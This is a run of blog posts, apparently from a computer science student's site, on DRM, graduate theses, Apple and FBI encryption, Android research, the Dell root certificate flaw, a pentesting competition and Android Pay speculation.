<p>The idea of using computers to illegally share digital content is not new to digital content services, but these services do give the act new motivation. Where users might have considered illegal sharing to avoid the cost of buying the digital content, now users seek to avoid subscription fees, ensure lifetime availability, and counteract limited internet connectivity. This motivates license holders to require services to implement DRM; systems designed to make it difficult for a user to permanently store and illegally share on-demand digital content.</p>
<p>However, I fear that many license holders demand these systems without actually realizing their limitations and unintended consequences. That is why in this blog post I would like to take the time to formulate the problem of using DRM to protect against illegal storing and sharing from the perspective of an information security researcher. Frankly, I think DRM is a losing battle and I want to present the reader with a robust formulation to justify why I see it that way.</p>
<h2>Cat and Mouse</h2>
<p>The first thing we have to understand is that DRM in practice cannot completely prevent illegal storage and sharing. Simply put, you can't show someone something without showing it to them and once they've seen it, you can't prevent them from having some ability to reproduce it. Even if you had a magic wand that could somehow wipe their memory, who's going to want what you have to share if they won't remember it? DRM cannot be perfect.</p>
<p>However, this is not to claim that DRM cannot be effective. Specifically, we can think of using DRM as making a trade-off between multiple factors. Namely, the cost of implementing the DRM and the inconvenience the DRM presents the benign user verses the time and skill required for the adversarial user to bypass it. In other words, an effective DRM system is one that is cheap to implement, produces few enough side effects that the benign user is still willing to pay for the service, and requires the adversarial user to commit a lot of time and skill to bypass.</p>
<p>So keep the good, throw out the bad, and we're done, right? Not so fast. We could do just that if the factors had no relationship to each other, if they were independent, but they aren't. Anything you do to make the adversarial user's task harder is going to increase the cost of implementation and inconvenience the benign user. Don't believe me? Implementing software DRM restricts the benign user to only systems that can run that software and allows the adversarial user to bypass the DRM using her own software. Operating system DRM now requires the adversarial user to implement their own operating system software, but also now restricts which operating systems the benign user can use. Hardware DRM raises the bar further by requiring the adversarial user to devise a hardware level bypass, but now the benign user can only use certain hardware. Hopefully you can see how this is a game of cat and mouse. The harder you make it for an adversarial user to bypass the DRM, the more restrictive the benign user's experience becomes. Similarly, as you increase the skill the adversarial user needs to bypass the DRM, you also raise the skill the programmer implementing the DRM needs to design it, which raises the cost. Basically, as you make the DRM better at thwarting the adversarial user, you also make the service more expensive and less appealing to the benign user.</p>
<p>Hopefully you now see why balancing the factors I've pointed out is not trivial. The next question is how hard is it to find this optimal balance. If it's easy we can just find it and we're done. We'd then know what degree of DRM to implement.</p>
<p>Sadly, I'm going to argue that it's not easy to find. In fact, the reason why finding it is difficult is because it's subjective and constantly changing! Notice that all the factors I defined are very soft. User experience is hard to measure. The user's tolerance for being inconvenienced is hard to measure. Even skill and cost are hard to measure in this context. Not only that, but these factors change over the course of public discussion. Opinions simply change. What all this means for us is that it's difficult to measure the factors we're interested in, it's difficult to determine when we've struck an optimal balance, and even if we strike a balance it might not stay balanced for very long. In other words, our best efforts will be no better than a random guess. Sure we might get lucky, but why pay to play in the first place?</p>
<h2>Two Extra Cents</h2>
<p>In general I find it interesting to argue that people are blinded by an unjustified pressure to achieve progress. That's not to claim that we never take steps in the right direction, but rather that when the path becomes too foggy we tend to start taking random steps and then spend a lot of effort convincing ourselves that the steps somehow weren't random. It's worth pondering if a solution has fallen into this pattern because the result when it does is a lot of effort spent on something that doesn't actually solve the intended problem.</p>Demystifying the Master’s Thesis — Is it right for you?2016-04-21T22:30:00-04:002016-04-21T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-21:/demystifying-the-masters-thesis.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its acceptance, I receive the last six credits needed to complete my degree. It was a long and intense process, and honestly, there are easier ways to earn credits.</p>
<p>Depending on your program, a thesis isn’t always a requirement. Many students opt for their program’s non-thesis track. So, how do you know if completing a thesis is right for you?</p>
<p>Let’s start by defining it. A master’s thesis is a cumulative work summarizing a student’s independent research on a specific topic related to their major. In my case, that topic was the security and privacy of Android intent inter-process communication. Translation—how do applications in an Android device share messages between one another and what features can we add to protect their “conversation?”</p>
<p>Thesis work is overseen by a research advisor, a professor who provides feedback and direction. Ultimately, it is the student’s responsibility to find a topic and perform the study on their own. Depending on the field of research, it will generally take a student one or two years to finish writing their master’s thesis. This makes prior planning essential to ensure that the thesis will be completed in time for graduation.</p>
<p>Once the thesis is complete and the advisor is satisfied with the work, the student has to defend it in front of a committee of four faculty members. The defense consists of a 20-minute presentation followed by questions. It takes about an hour. Once complete, the members convene privately to decide the outcome of the defense. A thesis can either be accepted, accepted with minor revision, accepted with major revision, or rejected. Thankfully, rejections are rare when the student follows their advisor’s guidance.</p>
<p>Once the thesis is accepted and any revisions are made, it’s sent off for publication and will usually be printed and placed in the university’s library. Most departments give their thesis students three to six elective credits depending on how much time went into creating the thesis.</p>
<p>So that’s all the gritty detail of how a master’s thesis works, but why do one in the first place? If your objective is to get your degree and go directly into industry as efficiently as possible, a thesis probably isn’t for you. It’s much safer to take classes to get those elective credits and most employers value time spent in internships more. The student who should consider a thesis is one who is interested in gaining exposure to research. I could write for great lengths about the difference between being an engineer and being a researcher, but suffice to say, the open-endedness makes researching a very different ballgame. A master’s thesis is a great opportunity to test the waters and see if that’s the kind of career you want to pursue. If you go for it, it opens the door to pursue a doctorate. If not, the door to industry will certainly be open to someone with your qualifications and research.</p>
<p>As with anything, it’s important to make the choice that is right for you. For me, the extra effort was well worth it. This fall I’ll be a doctorate student at Georgia Tech—a goal I am very proud to achieve. My experience completing my thesis at Syracuse University’s College of Engineering and Computer Science and in Professor Du’s lab has given me the confidence to take another leap into computer science research.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Apple’s Balancing Act—Yesterday, Today, and Tomorrow2016-04-01T22:30:00-04:002016-04-01T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-01:/apple-yesterday-today-tomorrow.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few months ago I read <a href="http://www.orbooks.com/catalog/splinternet-by-scott-malcomson/">Splinternet</a> by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:</p>
<blockquote>
<p>"There are monster …</p></blockquote><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few months ago I read <a href="http://www.orbooks.com/catalog/splinternet-by-scott-malcomson/">Splinternet</a> by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:</p>
<blockquote>
<p>"There are monster computers lurking in big business and big government that know everything from what motels you’ve stayed at to how much money you have in the bank. But at Apple we’re trying to balance the scales by giving individuals the kind of computer power once reserved for corporations."</p>
</blockquote>
<p>This quote is from 1984, and yet it could just as easily be mistaken for something said in 2016 given today’s controversies. I find it provocative for two reasons.</p>
<p>First, three decades later the issues raised in this marketing pitch are still relevant. Today, we struggle to decide how to handle technology that knows our very location, companies that track our browsing behavior via web cookies, and governments that make lethal decisions based on metadata. On one hand, it’s frustrating to see how little progress we’ve made in solving issues like these, but on the other it’s comforting to know that problems like these aren’t new and we’ve survived to this point in spite of them. I’m optimistic that as these issues grow to affect our lives in more significant ways, we’ll accelerate our efforts to resolve them.</p>
<p>Second, look at how much Apple has changed in three decades. Look at how they’ve gone from being the underdog, liberating the masses from the chains of the IBM mainframes only to become a massive conglomerate themselves. Modern Apple has appealing products for sure, but make no mistake that what they offer is a closed ecosystem where the customer is expected to run Apple software on top of Apple hardware. In the pursuit of perfecting the user experience, Apple has created a walled garden that takes control of their products away from the consumer. This is a stark contrast to the Apple that once made the analogy of the personal computer being a bicycle for the mind.</p>
<p>All that said, perhaps the Apple of tomorrow will strike a new balance between these two Apples I’ve mentioned. We’ve seen in recent months Apple’s commitment to resisting the FBI’s request for aid in unlocking encrypted iPhones. We might even see future iterations of the smartphone implement new security features that even Apple won’t be able to bypass. Only time will tell how the second act of this ongoing story will play out, but I’m excited to watch it develop.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Apple vs. the FBI2016-02-22T22:30:00-05:002016-02-22T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-22:/apple-vs-fbi.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on one of the shooters’ iPhone, only …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on one of the shooters’ iPhone, only to be thwarted by the discovery that the device was encrypted and password protected. Ten wrong guesses and the device will wipe itself clean including all the precious data within.</p>
<p>In light of the situation, a judge officially ordered Apple to aid the FBI in unlocking the iPhone. However, Apple has announced that they refuse to comply. Not only that, but Google has also announced that they support Apple’s decision to challenge the judge’s ruling. Why are two major tech companies reluctant to aid in an investigation? The problem has nothing to do with the technology, but rather the societal consequences such aid would bring.</p>
<p>In order for Apple to unlock the shooter’s device, they would have to circumvent the security mechanisms of their own device. This same technique could then be applied to any iPhone in the world. If Apple created such a capability and put it to use in this case, who’s to say they would never use it again? Allowing for such a power to exist would create a precedent which would undermine their customer’s trust in all of Apple’s products. And this distrust could radiate outwards to other tech companies like Google and Microsoft who could likewise do the same.</p>
<p>But the consequences wouldn’t only be to Apple’s profit margin. Encryption levels the playing field between the mighty and the weak. The same encryption that is thwarting the FBI’s investigation is simultaneously allowing citizens who live under oppressive regimes to circumvent country-wide censorship while avoiding unjust prosecution. Betray these users’ trust with this new precedent, take away their means of broadcasting their voice, and the whole world becomes a darker place.</p>
<p>The root of this problem is not one we are unfamiliar with. Time and time again we are presented with the question of the benefits of taking something away from everyone in order to prevent a few from abusing it. The answer is dependent on the details, and in this case I side with Apple in saying that they should not comply with this order. Compliance would not only hurt American citizens and American companies, it would hurt every citizen of every country. We cannot allow tragedy to drive us towards oppression. We must maintain transparency for the strong and encryption for the weak.</p>SU Senior Carter Yagemann’s Summer of Android2016-02-22T22:30:00-05:002016-02-22T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-22:/summer-of-android.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>This summer, Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his summer crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>This summer, Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his summer crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU) program. Carter investigated Android security using “an intent firewall” to protect user’s information on smartphones and tablets. We caught up with him following his final presentation of his research to a room of faculty and students at Syracuse University.</p>
<p><strong>How did you learn about the REU program?</strong></p>
<p>I was actually a student in one of Professor Du‘s classes and I had been doing internships in the private sector. I started as a web developer for Frontier Communications and then I worked for JPMorgan Chase in some of their security areas. I wanted to gain as much exposure as I could, so I was interested in getting into research. I approached Professor Du and he gave me an offer to do research under him.</p>
<p><strong>What has this experience been like?</strong></p>
<p>It’s been a lot of fun. It’s been nice to pursue what I’m interested in. There’s a lot less red tape and hurdles when you’re doing research versus in the private sector where there is a lot of regulation and accountability. It was really fun, really educational. I get to be with my peers, people more my age. I can mostly do what I want.</p>
<p>One of the things that is very different with research is that it’s very open ended. You don’t really know what’s going to get traction and what’s going to turn out to be impossible. It’s very free flowing and very flexible. The professors give you some ideas of where to start and you go from there to see if it works or not.</p>
<p>Professor Du was definitely interested in the intent firewall, but most of my research is my own work. I made all of the documentation and the website. I’m the one who crawled all the source code. He was the one who gave me the idea and I took off with it.</p>
<p><strong>Why did you choose to come to Syracuse University?</strong></p>
<p>I was choosing between here and Drexel University and I wasn’t sure that I wanted to be in a big city like Philadelphia. I picked Syracuse because there’s a nice atmosphere here. It’s a condensed campus, and there’s a lot going on. It’s a nice place to be.</p>
<p><strong>What else are you involved in at SU?</strong></p>
<p>I like everything about programming, so I do some hack-a-thons at the Student Sandbox at the Tech Garden in Downtown Syracuse. I have a few friends from the iSchool who often get together to do little things. Freshman year we created a platform called BeerText. The idea was you could text the name of a beer to a certain number and it would send you back a text with a description of the beer. It was really cool. It went viral on Twitter and Reddit. We got 35,000 users in 48 hours.</p>
<p><strong>What do you plan to do with your degree in Computer Science after you graduate?</strong></p>
<p>I definitely want to continue to pursue cybersecurity. Right now I am looking in multiple places. I’m looking at what’s going on out in Silicon Valley and what’s going on with the government.</p>
<p>I am also interested in being an entrepreneur. I have started writing some applications and I have pushed some out to the Google Play Store. I’m kind of a one-man app dev company. I’m definitely interested in getting out there on my own or with friends and talented people. On the other hand, large companies tend to have the resources to be able to do some pretty interesting things.</p>
<p>I just want to go where the interesting work is – something I haven’t seen before. I’m really open. Part of the point of this research was to try to find where I’m happiest.</p>
<h2>About the Electrical Engineering and Computer Science REU</h2>
<p>The Department of Electrical Engineering and Computer Science hosted its annual Research Experience for Undergraduates (REU) program this summer. It culminated with a half-day of presentations in July in which seven REU students from four different universities, including SU, Cornell, SUNY Fredonia, and the University of Illinois at Urbana-Champlain, completed research on a range of topics. The predominant theme was the development and security of the Android operating system.</p>
<p>Over the course of the summer, students worked with an advisor to select a topic that interested them and advanced the College’s research, then immersed themselves in their chosen subjects. The experience is educational for the students and the advisors alike.</p>
<p>“There are expectations that we are researching and getting something out of this experience. The first thing we are asked is what we want to work on, then our advisor helps us develop research questions from that,” describes Jonathan Secora, a computer science major at SU who focused on animations on the Android platform this summer.</p>
<p>Kevin Du, Professor of Computer Science, advised the students that focused on Android devices including:</p>
<ul>
<li><strong>Gabrielle George</strong>, “A Drinking the From the Fire Hydrant Approach to Learning Computer Science”</li>
<li><strong>Jonathan Secora</strong>, “Animation and Application in Android”</li>
<li><strong>Curtis Robinson</strong>, “A Short Survey of Android”</li>
<li><strong>Jason Davison</strong>, “Communication Problems with the Android System”</li>
<li><strong>Carter Yagemann</strong>, “Intent Firewall – Android Security via Intent Filtering”</li>
<li><strong>Fred Schlereth</strong>, Associate Research Professor of Electrical Engineering, advised Tom McLeod as he examined, “Trapping of Molecules Inside Non-Ideal Nanoscale Channels.”</li>
</ul>
<p>Current Computer Science Ph. D student, Paul Rattazi, advised Wesley Brooks at AFRL on “Self-Protecting Apps: Helping Developers Protect Your Sensitive Data.”</p>How Orange Helps You Sleep At Night2016-02-04T22:30:00-05:002016-02-04T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-04:/how-orange-helps-you-sleep-at-night.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? <a href="http://www.pnas.org/content/112/4/1232.full.pdf">Research conducted in recent years</a> has shown that sleep problems are on the rise and one theory gaining …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? <a href="http://www.pnas.org/content/112/4/1232.full.pdf">Research conducted in recent years</a> has shown that sleep problems are on the rise and one theory gaining momentum points to our electronics as the cause. Studies find that the abundance of blue light produced by our smartphones, tablets, and computer screens has a tangible impact on the chemistry in our bodies that regulates when to wake up and when to go to sleep. This isn’t a problem during the day when the sun naturally produces its own blue light, but staring at our own personal mini sun before bed can make falling asleep much more difficult. So what can we do about it? We could restrict ourselves from staring at screens an hour before bedtime, but the world is a busy place and our nighttime reading isn't always ink on paper. Instead, programmers are experimenting with software that reduces the level of blue light our screens produce after sunset. As the sun goes down, the screen shifts from a bluish glow to an orange tint and then back to blue with the following sunrise—promising a better night’s sleep for those of us that are unable (or unwilling) to give up our screens at night, This software is already publicly available for computers thanks to groups like <a href="https://justgetflux.com/">f.lux</a>, but availability on mobile devices is limited. Luckily, the big companies have taken notice and are taking action. <a href="http://www.apple.com/ios/preview/">In an upcoming version of iOS for iPhones and iPads</a>, Apple plans to introduce Night Shift. Flip it on and it'll automatically determine when the sun sets and rises in your area and adjust the screen's color accordingly. Just another reason to GO ORANGE.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Understanding Dell’s Root Certificate Problem2015-11-30T22:30:00-05:002015-11-30T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-30:/dell-root-certificate.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p><a href="http://www.theregister.co.uk/2015/11/23/dude_youre_getting_pwned/">A recent discovery in the security community</a> has researchers concerned about Dell devices. Some of these devices have been found to contain something known as a self signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p><a href="http://www.theregister.co.uk/2015/11/23/dude_youre_getting_pwned/">A recent discovery in the security community</a> has researchers concerned about Dell devices. Some of these devices have been found to contain something known as a self signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose a risk to users. This is not the first time this has happened, there was <a href="http://www.cnet.com/news/superfish-torments-lenovo-owners-with-more-than-adware/">an early case involving Lenovo devices</a> known as Superfish. In this article I will try to explain the problem in an approachable manner as well as point readers towards actions they can take to protect themselves. What are these self signed root certificates the security experts talk about and why are they dangerous? Understanding the problem requires understanding some of the characteristics of something known as the public key infrastructure. PKI is complex in practice, but we can use a simplified model to understand the problem at hand. All we need to know is that there are keys and certificates. By using a key, one can create certificates. If we trust the party who holds a particular key, then we can trust the certificates made from that key. Trust, in this case implies two fundamental trusts. First, that the party that holds the key will keep that key secret. Second, that party will only make certificates for other trustworthy parties. This is the network of trust upon which we perform our sensitive internet tasks such as banking, shopping, and communicating. The problem with the Dell root certificate and Superfish is that the manufacturer has created a "trusted" key which sits on every user's device. The same key. Steal this key from any one device and now that thief can create certificates that will be trusted by all devices. Google, Facebook, Bank of America, Amazon, all of these parties can be impersonated by creating new certificates. Exposing users to such a risk is a severe oversight. Thankfully, the concerns of the security community have been heard and users can now take actions to remove these self signed root certificates. If you use a Dell or Lenovo device, I encourage you to consult your manufacturer's website for more details:</p>
<ul>
<li><a href="http://www.dell.com/support/article/us/en/04/SLN300321?c=us&amp;l=en&amp;s=bsd&amp;cs=04">Dell Support</a></li>
<li><a href="https://support.lenovo.com/us/en/product_security/superfish_uninstall">Lenovo Support</a></li>
</ul>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Students Compete in RIT Cybersecurity Competition2015-11-11T22:30:00-05:002015-11-11T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-11:/rit-cybersecurity-competition.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members from the iSchool's Information Security Club. Hosted by RIT, this competition places competing university teams in the role of security consulting …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members from the iSchool's Information Security Club. Hosted by RIT, this competition places competing university teams in the role of security consulting companies contracted to assess the strength of a corporate network. This competition stresses technical and soft skills. Competitors must leverage their technical abilities to find vulnerabilities, as well as document and present their findings to the nontechnical executive board of the corporation. I am excited to announce that out of the nine university teams that competed from across the northeast, Syracuse University took third place! The Collegiate Pentesting Competition distinguishes itself from other cybersecurity competitions by placing a heavy emphasis on the business side of running a security company. Traditionally, security competitions fall into two categories: purely defensive or purely offensive. Purely defensive competitions, such as the Collegiate Cyber Defense Competition, restrict competitors to solely defending a network while a professional team of hackers tries to exploit vulnerabilities to gain access. This type of competition forbids any offensive actions on the part of the competing students. Conversely, purely offensive competitions, such as Capture The Flag events, present competitors with tasks that must be completed by breaking into vulnerable computer systems. Since the sole objective of these competitions is to recover the “flags,” competitors are encouraged to use any offensive tactics possible with complete disregard for collateral damage. In these competitions, the systems and networks often get destroyed as teams race to complete the given tasks. The Collegiate Pentesting Competition is a hybrid between offense and defense. Teams still use offensive techniques to detect and exploit vulnerable systems, but they must do so in a way which does not damage the systems or hinder the company's ability to do business. This requires the teams to be surgical in their methodology rather than simply “smashing and grabbing.” Overall, I highly enjoyed this competition. The level of realism and professionalism it entailed made competing a very educational experience. I look forward to seeing the Information Security Club compete next year.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Android for Your Laptop2015-11-03T22:30:00-05:002015-11-03T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-03:/android-for-your-laptop.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is a very bold vision , but it's one that was bound to happen and one that all Android users should be excited for. Up to this point, Chrome OS has been Google's dedicated operating system for their lineup of Chromebook computers. While Chrome OS offers unique features in terms of user experience and security at a price point that beats most other laptops on the market, Google's substantially different approach to designing laptops has made the Chromebook a relatively niche device. In the years it has existed, it has never reached the point of being a real competitor in the Windows-dominated laptop market. Contrast this with Android, which dominates the smartphone market at over 80 percent market share, and the reasoning behind this merging of the two operating systems becomes clear. If Google can successfully take their winning mobile user experience and port it to laptops, they'll have a formula for a laptop that stands toe-to-toe with Windows and OS X. I think that this is going to be the Google operating system to give Microsoft and Apple a run for their money. Users should be excited for this move as well. The average user now owns more devices than ever before and they want a consistent experience regardless of if they're using a phone, tablet, laptop, or desktop. Google does an excellent job of making the interaction between the user and the device clean, efficient, and friendly, and soon we'll get these same benefits for the laptop. However, there are a handful of design challenges that Google will have to overcome if they want Android for the laptop to be a success and not just another niche product like Chrome OS. For starters, laptops are dominantly used for content creation where mobile devices are mostly for consuming. Laptops are like the working man's pickup truck. Users have different demands for laptops than mobile devices. If Android is to succeed in the laptop environment, a greater emphasis will have to be placed on productivity. This means efficient switching between applications, strong support for keyboards, and plug-and-play functionality for external storage and additional peripherals. These are things only supported to a limited degree in current Android. Screen size also becomes an issue for Android on laptops. Android's current interfaces are designed for relatively small screens—under 10 inches in size. Now that Google wants Android to run on laptops and desktops, they'll have to redesign the look and feel for screen sizes in excess of 16 inches. It may only be a few extra inches, but this makes a huge difference if you don't want the screen to appear barren. For the average user who already uses Android on their mobile devices, I think the transition to Android for laptops will be pretty smooth. Android already has the email clients, web browsers, and office applications these users need for their everyday work. For the "power user" however, I think the new operating system will be a harder sell. These users manage corporate infrastructures, develop software, automate systems, deploy virtual machines, and regularly perform computing intensive tasks. For them, unfortunately, the tools they need simply don't exist on Android yet. I've anticipated Android moving to laptops and desktops for some time now and I hope others share my excitement over this recent announcement. There's a lot of work to be done, but I think that if Google can pull this off, we'll end up with something very special and unique.</p>
<h3>About The Author</h3>
<p>Carter Yagemann '15 is a master's student studying computer science in Syracuse University's College of Engineering and Computer Science. A research assistant in Professor Kevin Du's Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University's School of Information Studies (iSchool).</p>Initial Observations Regarding Android Pay2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/android-pay.html<p>Android Pay has just come out on the Google Play Store and it's an interesting concept in many ways. I can't help but be curious about its internal workings and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.</p>
<h2>Scope</h2>
<p>These …</p><p>Android Pay has just come out on the Google Play Store and it's an interesting concept in many ways. I can't help but be curious about its internal workings and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.</p>
<h2>Scope</h2>
<p>These are some initial thoughts I had from a security perspective after using Android Pay for the first time. These observations are purely speculative and black box, so they should not be mistaken for fact. These speculations are being made before having done any decompilation or reverse engineering. I will try my best throughout this document to clearly state the observations driving each speculation I make.</p>
<h2>Transparency</h2>
<p>The first thing that stuck out to me is that Android Pay does not appear to be transparent to the banks. When I added my debit card to the application, for example, I was presented with an EULA from my particular bank. After that, I had to verify my card by signing into my bank's application. In the case of my co-worker, he didn't have to verify his card, but he did receive an email from his bank within minutes containing information regarding Android Pay. In other words, while I may not know exactly how the Android Pay system works, I speculate that it does necessitate the banks being aware of Android Pay. You'll see why this is important in the next speculation.</p>
<h2>Virtual Account Number</h2>
<p>The other thing that immediately stuck out to me is that upon adding a card to Android Pay, that card is given a "virtual account number." The in-app description of this number reads, "This number is used instead of your actual card number so that your info isn't shared with stores."</p>
<p>Interesting.</p>
<p>While privacy may indeed be part of the motivation behind using a virtual number instead of the real card number, I don't believe this to be the full story. Having worked in a bank for a short while, I know that one of the biggest concerns a bank has is liability and therefore risk management. As we speculated earlier, Android Pay isn't transparent to the banks. This means that the banks have a choice in participating which, in turn, means that they aren't going to participate unless the risks associated with Android Pay are minimal. I speculate this to be the <strong>true</strong> reason for the virtual number. By using this number in place of the real card's number, should a vulnerability in Android Pay be exploited, damage is limited to exposure of the virtual number and not the real number. Google can reissue this virtual number while the banks are protected from having to reissue a new card. Granted, a fraudulent transaction or two may occur in the time it takes for the virtual number to be deactivated and reissued, but the majority of the burden falls on Google and not the bank. It's even possible that the banks might have an agreement with Google where Google is responsible for repaying the banks for fradulent charges occuring due to Android Pay.</p>
<p>This idea of risk mitigation will come up again in a later speculation I make.</p>
<h2>Transaction Processing</h2>
<p>The ultimate question my speculations aim to shed light on is how does Android Pay work? What happens when a user makes a purchase using Android Pay? Given the previous two speculations, we can make some educated guesses. I must stress again that this is still speculation, but food for thought none the less.</p>
<p>Before I reveal my next speculation, a bit of background is necessary. Something which you must understand is that in card processing, time is greatly of the essence. A transaction must be processed in a matter of seconds in order for the customer to be satisfied. In these few seconds, the transaction has to pass through multiple parties. In the case of the traditional card, there's the point-of-sales terminal which swipes the card, some back-end system for managing these terminals, the credit card processor (such as Visa), and the bank (such as JPMorgan Chase). The transaction has to pass through all these parties in order to be allowed.</p>
<p>With that understood, I tease my next speculation with a question: Who translates the virtual number into the real number? Surely this translation must happen somewhere, otherwise why would the Android Pay user provide a credit or debit card number in the first place? I speculate that it isn't Google.</p>
<p>Think about it. If Google was translating the virtual number into the real number at the time of use, the process would become transparent to the banks. There would be no reason for Google to solicit partnership with them. But we know Android Pay isn't transparent to the banks, which is strong reason to speculate that this is not the case. Google likely shares the virtual number with the bank at some point during the process of adding or verifying the card.</p>
<p>Handling the virtual number in this manner benefits both parties. First, this decreases the bank's risk because if the translation isn't handled by Google, then Google won't have to send the real number over the wire to the next party in the processing chain. This benefits Google as well because no translating on their end means no need to build out any infrastructure. They can piggyback off the existing card processing infrastructure.</p>
<h2>Unanswered Questions</h2>
<p>So who does the translation? If it isn't the retailer and it isn't Google, that leaves the bank and the card processor. Sadly, I don't have an answer to this question.</p>
<p>The other question I don't have an answer for is what is actually given to the retailer via NFC at the time of use. Is it simply the virtual number or is it something else?</p>
<p>These question I leave to the reverse-engineers.</p>How Number of Limbs Relates to Robots and Organisms2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/locomotion.html<p>This weekend was the weekend over which DARPA hosted its large robotics challenge where semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It …</p><p>This weekend was the weekend over which DARPA hosted its large robotics challenge where semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It was quite the spectacle to watch and while it was impressive to see how far robotics has come, it also served as a reminder of how far robotics still has yet to go. The robots were very slow at performing their tasks and there was plenty of falling over and unintended failures. Half the robots I observed couldn't even complete the first task of opening a normal door. In short, we can all rest easy knowing that these robots aren't going to be stealing our jobs or planning a violent uprising any time soon.</p>
